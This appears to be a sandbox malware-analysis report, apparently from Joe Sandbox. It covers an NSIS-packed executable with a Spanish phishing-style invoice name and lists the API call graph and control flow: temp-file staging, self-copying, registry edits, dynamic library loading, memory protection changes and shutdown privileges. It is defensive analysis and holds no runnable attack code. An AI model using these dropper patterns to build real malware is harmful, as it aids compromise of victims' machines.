5153->5157 5154->5142 5158 403ef9 5155->5158 5159 403f0e 5155->5159 5156->5142 5157->5133 5157->5144 5157->5145 5157->5150 5157->5153 5164 4042d6 19 API calls 5157->5164 5179 4041a1 DestroyWindow 5157->5179 5161 40140b 2 API calls 5158->5161 5160 40140b 2 API calls 5159->5160 5162 403f15 5160->5162 5161->5163 5162->5142 5162->5163 5163->5152 5165 404089 GetDlgItem 5164->5165 5166 4040a6 ShowWindow KiUserCallbackDispatcher 5165->5166 5167 40409e 5165->5167 5188 4042f8 KiUserCallbackDispatcher 5166->5188 5167->5166 5169 4040d0 EnableWindow 5172 4040e4 5169->5172 5170 4040e9 GetSystemMenu EnableMenuItem SendMessageW 5171 404119 SendMessageW 5170->5171 5170->5172 5171->5172 5172->5170 5189 40430b SendMessageW 5172->5189 5190 406212 lstrcpynW 5172->5190 5175 404147 lstrlenW 5176 406234 18 API calls 5175->5176 5177 40415d SetWindowTextW 5176->5177 5178 401389 2 API calls 5177->5178 5178->5157 5179->5137 5180 4041bb CreateDialogParamW 5179->5180 5180->5137 5181 4041ee 5180->5181 5182 4042d6 19 API calls 5181->5182 5183 4041f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5182->5183 5184 401389 2 API calls 5183->5184 5185 40423f 5184->5185 5185->5133 5186 404247 ShowWindow 5185->5186 5187 404322 SendMessageW 5186->5187 5187->5137 5188->5169 5189->5172 5190->5175 5619 40287e 5620 402c53 18 API calls 5619->5620 5621 402885 FindFirstFileW 5620->5621 5622 4028ad 5621->5622 5626 402898 5621->5626 5624 4028b6 5622->5624 5627 406159 wsprintfW 5622->5627 5628 406212 lstrcpynW 5624->5628 5627->5624 5628->5626 5629 4019ff 5630 402c53 18 API calls 5629->5630 5631 401a06 5630->5631 5632 402c53 18 API calls 5631->5632 5633 401a0f 5632->5633 5634 401a16 lstrcmpiW 5633->5634 5635 401a28 lstrcmpW 5633->5635 5636 401a1c 5634->5636 5635->5636 5637 401000 5638 401037 BeginPaint GetClientRect 5637->5638 5639 40100c DefWindowProcW 5637->5639 5641 4010f3 5638->5641 5642 401179 5639->5642 5643 401073 CreateBrushIndirect FillRect DeleteObject 5641->5643 5644 4010fc 5641->5644 5643->5641 5645 401102 CreateFontIndirectW 5644->5645 5646 401167 EndPaint 5644->5646 5645->5646 5647 401112 6 API calls 5645->5647 5646->5642 5647->5646 5648 401503 5649 40151e 5648->5649 5650 40150b 5648->5650 5651 402c31 18 API calls 5650->5651 5651->5649 5652 402104 5653 402c53 18 API calls 5652->5653 5654 40210b 5653->5654 5655 402c53 18 API calls 5654->5655 5656 402115 5655->5656 5657 402c53 18 API calls 5656->5657 5658 40211f 5657->5658 5659 402c53 18 API calls 5658->5659 5660 402129 5659->5660 5661 402c53 18 API calls 5660->5661 5663 402133 5661->5663 5662 402172 CoCreateInstance 5667 402191 5662->5667 5663->5662 5664 402c53 18 API calls 5663->5664 5664->5662 5665 401423 25 API calls 5666 402250 5665->5666 5667->5665 5667->5666 4264 402805 4265 40280c 4264->4265 4271 402a86 4264->4271 4266 402c31 18 API calls 4265->4266 4267 402813 4266->4267 4268 402822 SetFilePointer 4267->4268 4269 402832 4268->4269 4268->4271 4272 406159 wsprintfW 4269->4272 4272->4271 4273 100027c7 4274 10002817 4273->4274 4275 100027d7 VirtualProtect 4273->4275 4275->4274 4586 40230c 4587 402314 4586->4587 4589 40231a 4586->4589 4588 402c53 18 API calls 4587->4588 4588->4589 4590 402328 4589->4590 4591 402c53 18 API calls 4589->4591 4592 402336 4590->4592 4594 402c53 18 API calls 4590->4594 4591->4590 4593 402c53 18 API calls 4592->4593 4595 40233f WritePrivateProfileStringW 4593->4595 4594->4592 5668 40190c 5669 401943 5668->5669 5670 402c53 18 API calls 5669->5670 5671 401948 5670->5671 5672 405a03 69 API calls 5671->5672 5673 401951 5672->5673 5674 401f8c 5675 402c53 18 API calls 5674->5675 5676 401f93 5675->5676 5677 4065ec 5 API calls 5676->5677 5678 401fa2 5677->5678 5679 401fbe GlobalAlloc 5678->5679 5681 402026 5678->5681 5680 401fd2 5679->5680 5679->5681 5682 4065ec 5 API calls 5680->5682 5683 401fd9 5682->5683 5684 4065ec 5 API calls 5683->5684 5685 401fe3 5684->5685 5685->5681 5689 406159 wsprintfW 5685->5689 5687 402018 5690 406159 wsprintfW 5687->5690 5689->5687 5690->5681 5691 40258c 5692 402c53 18 API calls 5691->5692 5693 402593 5692->5693 5696 405de7 GetFileAttributesW CreateFileW 5693->5696 5695 40259f 5696->5695 4596 40238e 4597 402393 4596->4597 4598 4023be 4596->4598 4619 402d5d 4597->4619 4599 402c53 18 API calls 4598->4599 4603 4023c5 4599->4603 4601 40239a 4602 4023a4 4601->4602 4604 4023db 4601->4604 4605 402c53 18 API calls 4602->4605 4608 402c93 RegOpenKeyExW 4603->4608 4607 4023ab RegDeleteValueW RegCloseKey 4605->4607 4607->4604 4609 402d27 4608->4609 4612 402cbe 4608->4612 4609->4604 4610 402ce4 RegEnumKeyW 4611 402cf6 RegCloseKey 4610->4611 4610->4612 4614 4065ec 5 API calls 4611->4614 4612->4610 4612->4611 4613 402d1b RegCloseKey 4612->4613 4615 402c93 5 API calls 4612->4615 4617 402d0a 4613->4617 4616 402d06 4614->4616 4615->4612 4616->4617 4618 402d36 RegDeleteKeyW 4616->4618 4617->4609 4618->4617 4620 402c53 18 API calls 4619->4620 4621 402d76 4620->4621 4622 402d84 RegOpenKeyExW 4621->4622 4622->4601 5697 401d0e 5698 402c31 18 API calls 5697->5698 5699 401d15 5698->5699 5700 402c31 18 API calls 5699->5700 5701 401d21 GetDlgItem 5700->5701 5702 4025a8 5701->5702 5703 1000164f 5704 10001516 GlobalFree 5703->5704 5706 10001667 5704->5706 5705 100016ad GlobalFree 5706->5705 5707 10001682 5706->5707 5708 10001699 VirtualFree 5706->5708 5707->5705 5708->5705 5709 40190f 5710 402c53 18 API calls 5709->5710 5711 401916 5710->5711 5712 405957 MessageBoxIndirectW 5711->5712 5713 40191f 5712->5713 5714 406d0f 5718 40675e 5714->5718 5715 4070c9 5716 4067e8 GlobalAlloc 5716->5715 5716->5718 5717 4067df GlobalFree 5717->5716 5718->5715 5718->5716 5718->5717 5718->5718 5719 406856 GlobalFree 5718->5719 5720 40685f GlobalAlloc 5718->5720 5719->5720 5720->5715 5720->5718 4623 402511 4624 402d5d 19 API calls 4623->4624 4625 40251b 4624->4625 4626 402c31 18 API calls 4625->4626 4627 402524 4626->4627 4628 402540 RegEnumKeyW 4627->4628 4629 40254c RegEnumValueW 4627->4629 4631 4028a1 4627->4631 4630 402565 RegCloseKey 4628->4630 4629->4630 4629->4631 4630->4631 5728 401491 5729 405371 25 API calls 5728->5729 5730 401498 5729->5730 5738 10001058 5740 10001074 5738->5740 5739 100010dd 5740->5739 5741 10001516 GlobalFree 5740->5741 5742 10001092 5740->5742 5741->5742 5743 10001516 GlobalFree 5742->5743 5744 100010a2 5743->5744 5745 100010b2 5744->5745 5746 100010a9 GlobalSize 5744->5746 5747 100010b6 GlobalAlloc 5745->5747 5750 100010c7 5745->5750 5746->5745 5748 1000153d 3 API calls 5747->5748 5748->5750 5749 100010d2 GlobalFree 5749->5739 5750->5749 5751 402d98 5752 402dc3 5751->5752 5753 402daa SetTimer 5751->5753 5754 402e11 5752->5754 5755 402e17 MulDiv 5752->5755 5753->5752 5756 402dd1 wsprintfW SetWindowTextW SetDlgItemTextW 5755->5756 5756->5754 4656 401c19 4657 402c31 18 API calls 4656->4657 4658 401c20 4657->4658 4659 402c31 18 API calls 4658->4659 4660 401c2d 4659->4660 4661 401c42 4660->4661 4662 402c53 18 API calls 4660->4662 4663 401c52 4661->4663 4664 402c53 18 API calls 4661->4664 4662->4661 4665 401ca9 4663->4665 4666 401c5d 4663->4666 4664->4663 4668 402c53 18 API calls 4665->4668 4667 402c31 18 API calls 4666->4667 4669 401c62 4667->4669 4670 401cae 4668->4670 4671 402c31 18 API calls 4669->4671 4672 402c53 18 API calls 4670->4672 4673 401c6e 4671->4673 4674 401cb7 FindWindowExW 4672->4674 4675 401c99 SendMessageW 4673->4675 4676 401c7b SendMessageTimeoutW 4673->4676 4677 401cd9 4674->4677 4675->4677 4676->4677 5758 403a19 5759 403a24 5758->5759 5760 403a28 5759->5760 5761 403a2b GlobalAlloc 5759->5761 5761->5760 4684 40249d 4685 402d5d 19 API calls 4684->4685 4686 4024a7 4685->4686 4687 402c53 18 API calls 4686->4687 4688 4024b0 4687->4688 4689 4024bb RegQueryValueExW 4688->4689 4692 4028a1 4688->4692 4690 4024e1 RegCloseKey 4689->4690 4691 4024db 4689->4691 4690->4692 4691->4690 4695 406159 wsprintfW 4691->4695 4695->4690 5762 40149e 5763 4022f7 5762->5763 5764 4014ac PostQuitMessage 5762->5764 5764->5763 5765 100010e1 5774 10001111 5765->5774 5766 100011d8 GlobalFree 5767 100012ba 2 API calls 5767->5774 5768 100011d3 5768->5766 5769 10001272 2 API calls 5772 100011c4 GlobalFree 5769->5772 5770 10001164 GlobalAlloc 5770->5774 5771 100011f8 GlobalFree 5771->5774 5772->5774 5773 100012e1 lstrcpyW 5773->5774 5774->5766 5774->5767 5774->5768 5774->5769 5774->5770 5774->5771 5774->5772 5774->5773 4720 4015a3 4721 402c53 18 API calls 4720->4721 4722 4015aa SetFileAttributesW 4721->4722 4723 4015bc 4722->4723 5775 404424 lstrlenW 5776 404443 5775->5776 5777 404445 WideCharToMultiByte 5775->5777 5776->5777 5785 40472a 5786 404760 5785->5786 5787 40473a 5785->5787 5789 40433d 8 API calls 5786->5789 5788 4042d6 19 API calls 5787->5788 5790 404747 SetDlgItemTextW 5788->5790 5791 40476c 5789->5791 5790->5786 4741 4025ae 4742 4025c2 4741->4742 4743 4025dd 4741->4743 4744 402c31 18 API calls 4742->4744 4745 402611 4743->4745 4746 4025e2 4743->4746 4752 4025c9 4744->4752 4747 402c53 18 API calls 4745->4747 4748 402c53 18 API calls 4746->4748 4749 402618 lstrlenW 4747->4749 4750 4025e9 WideCharToMultiByte lstrlenA 4748->4750 4749->4752 4750->4752 4751 40265b 4752->4751 4753 40264d 4752->4753 4754 40263e 4752->4754 4755 405e99 WriteFile 4753->4755 4756 405ec8 5 API calls 4754->4756 4755->4751 4757 402645 4756->4757 4757->4751 4757->4753 4799 4054b0 4800 4054d1 GetDlgItem GetDlgItem GetDlgItem 4799->4800 4801 40565a 4799->4801 4845 40430b SendMessageW 4800->4845 4802 405663 GetDlgItem CreateThread CloseHandle 4801->4802 4803 40568b 4801->4803 4802->4803 4868 405444 5 API calls 4802->4868 4806 4056b6 4803->4806 4807 4056a2 ShowWindow ShowWindow 4803->4807 4808 4056db 4803->4808 4805 405541 4811 405548 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4805->4811 4809 4056c2 4806->4809 4810 405716 4806->4810 4850 40430b SendMessageW 4807->4850 4854 40433d 4808->4854 4813 4056f0 ShowWindow 4809->4813 4814 4056ca 4809->4814 4810->4808 4818 405724 SendMessageW 4810->4818 4816 4055b6 4811->4816 4817 40559a SendMessageW SendMessageW 4811->4817 4820 405710 4813->4820 4821 405702 4813->4821 4851 4042af 4814->4851 4823 4055c9 4816->4823 4824 4055bb SendMessageW 4816->4824 4817->4816 4825 4056e9 4818->4825 4826 40573d CreatePopupMenu 4818->4826 4822 4042af SendMessageW 4820->4822 4827 405371 25 API calls 4821->4827 4822->4810 4846 4042d6 4823->4846 4824->4823 4828 406234 18 API calls 4826->4828 4827->4820 4830 40574d AppendMenuW 4828->4830 4832 40576a GetWindowRect 4830->4832 4833 40577d TrackPopupMenu 4830->4833 4831 4055d9 4834 4055e2 ShowWindow 4831->4834 4835 405616 GetDlgItem SendMessageW 4831->4835 4832->4833 4833->4825 4836 405798 4833->4836 4837 405605 4834->4837 4838 4055f8 ShowWindow 4834->4838 4835->4825 4839 40563d SendMessageW SendMessageW 4835->4839 4840 4057b4 SendMessageW 4836->4840 4849 40430b SendMessageW 4837->4849 4838->4837 4839->4825 4840->4840 4841 4057d1 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4840->4841 4843 4057f6 SendMessageW 4841->4843 4843->4843 4844 40581f GlobalUnlock SetClipboardData CloseClipboard 4843->4844 4844->4825 4845->4805 4847 406234 18 API calls 4846->4847 4848 4042e1 SetDlgItemTextW 4847->4848 4848->4831 4849->4835 4850->4806 4852 4042b6 4851->4852 4853 4042bc SendMessageW 4851->4853 4852->4853 4853->4808 4855 4043de 4854->4855 4856 404355 GetWindowLongW 4854->4856 4855->4825 4856->4855 4857 404366 4856->4857 4858 404375 GetSysColor 4857->4858 4859 404378 4857->4859 4858->4859 4860 404388 SetBkMode 4859->4860 4861 40437e SetTextColor 4859->4861 4862 4043a0 GetSysColor 4860->4862 4863 4043a6 4860->4863 4861->4860 4862->4863 4864 4043b7 4863->4864 4865 4043ad SetBkColor 4863->4865 4864->4855 4866 4043d1 CreateBrushIndirect 4864->4866 4867 4043ca DeleteObject 4864->4867 4865->4864 4866->4855 4867->4866 5792 401a30 5793 402c53 18 API calls 5792->5793 5794 401a39 ExpandEnvironmentStringsW 5793->5794 5795 401a4d 5794->5795 5797 401a60 5794->5797 5796 401a52 lstrcmpW 5795->5796 5795->5797 5796->5797 4892 402032 4893 402044 4892->4893 4894 4020f6 4892->4894 4895 402c53 18 API calls 4893->4895 4896 401423 25 API calls 4894->4896 4897 40204b 4895->4897 4902 402250 4896->4902 4898 402c53 18 API calls 4897->4898 4899 402054 4898->4899 4900 40206a LoadLibraryExW 4899->4900 4901 40205c GetModuleHandleW 4899->4901 4900->4894 4903 40207b 4900->4903 4901->4900 4901->4903 4915 40665b WideCharToMultiByte 4903->4915 4906 4020c5 4910 405371 25 API calls 4906->4910 4907 40208c 4908 402094 4907->4908 4909 4020ab 4907->4909 4911 401423 25 API calls 4908->4911 4918 10001759 4909->4918 4912 40209c 4910->4912 4911->4912 4912->4902 4913 4020e8 FreeLibrary 4912->4913 4913->4902 4916 406685 GetProcAddress 4915->4916 4917 402086 4915->4917 4916->4917 4917->4906 4917->4907 4919 10001789 4918->4919 4960 10001b18 4919->4960 4921 10001790 4922 100018a6 4921->4922 4923 100017a1 4921->4923 4924 100017a8 4921->4924 4922->4912 5009 10002286 4923->5009 4992 100022d0 4924->4992 4929 1000180c 4933 10001812 4929->4933 4934 1000184e 4929->4934 4930 100017ee 5022 100024a9 4930->5022 4931 100017be 4938 100017c4 4931->4938 4939 100017cf 4931->4939 4941 100015b4 3 API calls 4933->4941 4936 100024a9 10 API calls 4934->4936 4935 100017d7 4943 100017cd 4935->4943 5019 10002b5f 4935->5019 4944 10001840 4936->4944 4937 100017f4 5033 100015b4 4937->5033 4938->4943 5003 100028a4 4938->5003 5013 10002645 4939->5013 4947 10001828 4941->4947 4943->4929 4943->4930 4951 10001895 4944->4951 5044 1000246c 4944->5044 4950 100024a9 10 API calls 4947->4950 4949 100017d5 4949->4943 4950->4944 4951->4922 4955 1000189f GlobalFree 4951->4955 4955->4922 4957 10001881 4957->4951 5048 1000153d wsprintfW 4957->5048 4958 1000187a FreeLibrary 4958->4957 5051 1000121b GlobalAlloc 4960->5051 4962 10001b3c 5052 1000121b GlobalAlloc 4962->5052 4964 10001d7a GlobalFree GlobalFree GlobalFree 4965 10001d97 4964->4965 4978 10001de1 4964->4978 4966 100020ee 4965->4966 4977 10001dac 4965->4977 4965->4978 4968 10002110 GetModuleHandleW 4966->4968 4966->4978 4967 10001c1d GlobalAlloc 4969 10001b47 4967->4969 4972 10002121 LoadLibraryW 4968->4972 4973 10002136 4968->4973 4969->4964 4969->4967 4970 10002048 4969->4970 4971 10001c86 GlobalFree 4969->4971 4974 10001c68 lstrcpyW 4969->4974 4975 10001c72 lstrcpyW 4969->4975 4969->4978 4987 10001cc4 4969->4987 4988 10001f37 GlobalFree 4969->4988 4989 1000122c 2 API calls 4969->4989 5058 1000121b GlobalAlloc 4969->5058 4970->4978 4986 10002090 lstrcpyW 4970->4986 4971->4969 4972->4973 4972->4978 5059 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4973->5059 4974->4975 4975->4969 4977->4978 5055 1000122c 4977->5055 4978->4921 4979 10002188 4979->4978 4980 10002195 lstrlenW 4979->4980 5060 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4980->5060 4984 10002148 4984->4979 4991 10002172 GetProcAddress 4984->4991 4985 100021af 4985->4978 4986->4978 4987->4969 5053 1000158f GlobalSize GlobalAlloc 4987->5053 4988->4969 4989->4969 4991->4979 4994 100022e8 4992->4994 4993 1000122c GlobalAlloc lstrcpynW 4993->4994 4994->4993 4996 10002415 GlobalFree 4994->4996 4997 100023d3 lstrlenW 4994->4997 4998 100023ba GlobalAlloc CLSIDFromString 4994->4998 4999 1000238f GlobalAlloc WideCharToMultiByte 4994->4999 5062 100012ba 4994->5062 4996->4994 5000 100017ae 4996->5000 4997->4996 5002 100023de 4997->5002 4998->4996 4999->4996 5000->4931 5000->4935 5000->4943 5002->4996 5066 100025d9 5002->5066 5005 100028b6 5003->5005 5004 1000295b ReadFile 5006 10002979 5004->5006 5005->5004 5007 10002a75 5006->5007 5008 10002a6a GetLastError 5006->5008 5007->4943 5008->5007 5010 10002296 5009->5010 5011 100017a7 5009->5011 5010->5011 5012 100022a8 GlobalAlloc 5010->5012 5011->4924 5012->5010 5016 10002661 5013->5016 5014 100026b2 GlobalAlloc 5018 100026d4 5014->5018 5015 100026c5 5017 100026ca GlobalSize 5015->5017 5015->5018 5016->5014 5016->5015 5017->5018 5018->4949 5020 10002b6a 5019->5020 5021 10002baa GlobalFree 5020->5021 5069 1000121b GlobalAlloc 5022->5069 5024 10002530 StringFromGUID2 5031 100024b3 5024->5031 5025 10002541 lstrcpynW 5025->5031 5026 1000250b MultiByteToWideChar 5026->5031 5027 10002554 wsprintfW 5027->5031 5028 10002571 GlobalFree 5028->5031 5029 100025ac GlobalFree 5029->4937 5030 10001272 2 API calls 5030->5031 5031->5024 5031->5025 5031->5026 5031->5027 5031->5028 5031->5029 5031->5030 5070 100012e1 5031->5070 5074 1000121b GlobalAlloc 5033->5074 5035 100015ba 5037 100015e1 5035->5037 5038 100015c7 lstrcpyW 5035->5038 5039 100015fb 5037->5039 5040 100015e6 wsprintfW 5037->5040 5038->5039 5041 10001272 5039->5041 5040->5039 5042 100012b5 GlobalFree 5041->5042 5043 1000127b GlobalAlloc lstrcpynW 5041->5043 5042->4944 5043->5042 5045 10001861 5044->5045 5046 1000247a 5044->5046 5045->4957 5045->4958 5046->5045 5047 10002496 GlobalFree 5046->5047 5047->5046 5049 10001272 2 API calls 5048->5049 5050 1000155e 5049->5050 5050->4951 5051->4962 5052->4969 5054 100015ad 5053->5054 5054->4987 5061 1000121b GlobalAlloc 5055->5061 5057 1000123b lstrcpynW 5057->4978 5058->4969 5059->4984 5060->4985 5061->5057 5063 100012c1 5062->5063 5064 1000122c 2 API calls 5063->5064 5065 100012df 5064->5065 5065->4994 5067 100025e7 VirtualAlloc 5066->5067 5068 1000263d 5066->5068 5067->5068 5068->5002 5069->5031 5071 100012ea 5070->5071 5072 1000130c 5070->5072 5071->5072 5073 100012f0 lstrcpyW 5071->5073 5072->5031 5073->5072 5074->5035 5080 401db3 GetDC 5081 402c31 18 API calls 5080->5081 5082 401dc5 GetDeviceCaps MulDiv ReleaseDC 5081->5082 5083 402c31 18 API calls 5082->5083 5084 401df6 5083->5084 5085 406234 18 API calls 5084->5085 5086 401e33 CreateFontIndirectW 5085->5086 5087 4025a8 5086->5087 5803 401d33 5804 402c31 18 API calls 5803->5804 5805 401d44 SetWindowLongW 5804->5805 5806 402adb 5805->5806 5088 401735 5089 402c53 18 API calls 5088->5089 5090 40173c SearchPathW 5089->5090 5091 401757 5090->5091 5807 402ab6 SendMessageW 5808 402ad0 InvalidateRect 5807->5808 5809 402adb 5807->5809 5808->5809 5810 402837 5811 40283d 5810->5811 5812 402845 FindClose 5811->5812 5813 402adb 5811->5813 5812->5813 5814 4014b8 5815 4014be 5814->5815 5816 401389 2 API calls 5815->5816 5817 4014c6 5816->5817 5825 4029be 5826 402c31 18 API calls 5825->5826 5827 4029c4 5826->5827 5828 402a04 5827->5828 5829 4029eb 5827->5829 5830 4028a1 5827->5830 5832 402a1e 5828->5832 5833 402a0e 5828->5833 5831 4029f0 5829->5831 5838 402a01 5829->5838 5839 406212 lstrcpynW 5831->5839 5835 406234 18 API calls 5832->5835 5834 402c31 18 API calls 5833->5834 5834->5838 5835->5838 5838->5830 5840 406159 wsprintfW 5838->5840 5839->5830 5840->5830 5841 10002a7f 5842 10002a97 5841->5842 5843 1000158f 2 API calls 5842->5843 5844 10002ab2 5843->5844

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 40344a-40347d SetErrorMode GetVersion 1 403490 0->1 2 40347f-403487 call 4065ec 0->2 4 403495-4034a9 call 40657c lstrlenA 1->4 2->1 7 403489 2->7 9 4034ab-40351f call 4065ec * 2 #17 OleInitialize SHGetFileInfoW call 406212 GetCommandLineW call 406212 GetModuleHandleW 4->9 7->1 18 403521-403528 9->18 19 403529-403543 call 405bf3 CharNextW 9->19 18->19 22 403549-40354f 19->22 23 40365a-403674 GetTempPathW call 403419 19->23 25 403551-403556 22->25 26 403558-40355c 22->26 30 403676-403694 GetWindowsDirectoryW lstrcatW call 403419 23->30 31 4036cc-4036e6 DeleteFileW call 402ed5 23->31 25->25 25->26 28 403563-403567 26->28 29 40355e-403562 26->29 32 403626-403633 call 405bf3 28->32 33 40356d-403573 28->33 29->28 30->31 48 403696-4036c6 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403419 30->48 51 403797-4037a7 call 403969 OleUninitialize 31->51 52 4036ec-4036f2 31->52 49 403635-403636 32->49 50 403637-40363d 32->50 37 403575-40357d 33->37 38 40358e-4035c7 33->38 44 403584 37->44 45 40357f-403582 37->45 39 4035e4-40361e 38->39 40 4035c9-4035ce 38->40 39->32 47 403620-403624 39->47 40->39 46 4035d0-4035d8 40->46 44->38 45->38 45->44 54 4035da-4035dd 46->54 55 4035df 46->55 47->32 56 403645-403653 call 406212 47->56 48->31 48->51 49->50 50->22 58 403643 50->58 68 4038cd-4038d3 51->68 69 4037ad-4037bd call 405957 ExitProcess 51->69 59 403787-40378e call 403a5b 52->59 60 4036f8-403703 call 405bf3 52->60 54->39 54->55 55->39 63 403658 56->63 58->63 67 403793 59->67 71 403751-40375b 60->71 72 403705-40373a 60->72 63->23 67->51 74 403951-403959 68->74 75 4038d5-4038eb GetCurrentProcess OpenProcessToken 68->75 79 4037c3-4037d7 call 4058da lstrcatW 71->79 80 40375d-40376b call 405cce 71->80 76 40373c-403740 72->76 77 40395b 74->77 78 40395f-403963 ExitProcess 74->78 82 403921-40392f call 4065ec 75->82 83 4038ed-40391b LookupPrivilegeValueW AdjustTokenPrivileges 75->83 84 403742-403747 76->84 85 403749-40374d 76->85 77->78 94 4037e4-4037fe lstrcatW lstrcmpiW 79->94 95 4037d9-4037df lstrcatW 79->95 80->51 93 40376d-403783 call 406212 * 2 80->93 96 403931-40393b 82->96 97 40393d-403948 ExitWindowsEx 82->97 83->82 84->85 89 40374f 84->89 85->76 85->89 89->71 93->59 94->51 100 403800-403803 94->100 95->94 96->97 98 40394a-40394c call 40140b 96->98 97->74 97->98 98->74 104 403805-40380a call 405840 100->104 105 40380c call 4058bd 100->105 109 403811-40381f SetCurrentDirectoryW 104->109 105->109 112 403821-403827 call 406212 109->112 113 40382c-403855 call 406212 109->113 112->113 117 40385a-403876 call 406234 DeleteFileW 113->117 120 4038b7-4038bf 117->120 121 403878-403888 CopyFileW 117->121 120->117 122 4038c1-4038c8 call 4060b3 120->122 121->120 123 40388a-4038aa call 4060b3 call 406234 call 4058f2 121->123 122->51 123->120 132 4038ac-4038b3 CloseHandle 123->132 132->120
                                                APIs
                                                • SetErrorMode.KERNELBASE ref: 0040346D
                                                • GetVersion.KERNEL32 ref: 00403473
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040349C
                                                • #17.COMCTL32(00000007,00000009), ref: 004034BF
                                                • OleInitialize.OLE32(00000000), ref: 004034C6
                                                • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 004034E2
                                                • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 004034F7
                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe",00000000), ref: 0040350A
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe",00000020), ref: 00403531
                                                  • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                  • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040366B
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040367C
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403688
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040369C
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004036A4
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004036B5
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004036BD
                                                • DeleteFileW.KERNELBASE(1033), ref: 004036D1
                                                  • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                • OleUninitialize.OLE32(?), ref: 0040379C
                                                • ExitProcess.KERNEL32 ref: 004037BD
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe",00000000,?), ref: 004037D0
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe",00000000,?), ref: 004037DF
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe",00000000,?), ref: 004037EA
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe",00000000,?), ref: 004037F6
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403812
                                                • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?), ref: 0040386C
                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe,00420EE8,?), ref: 00403880
                                                • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 004038AD
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004038DC
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004038E3
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                • AdjustTokenPrivileges.ADVAPI32 ref: 0040391B
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403940
                                                • ExitProcess.KERNEL32 ref: 00403963
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
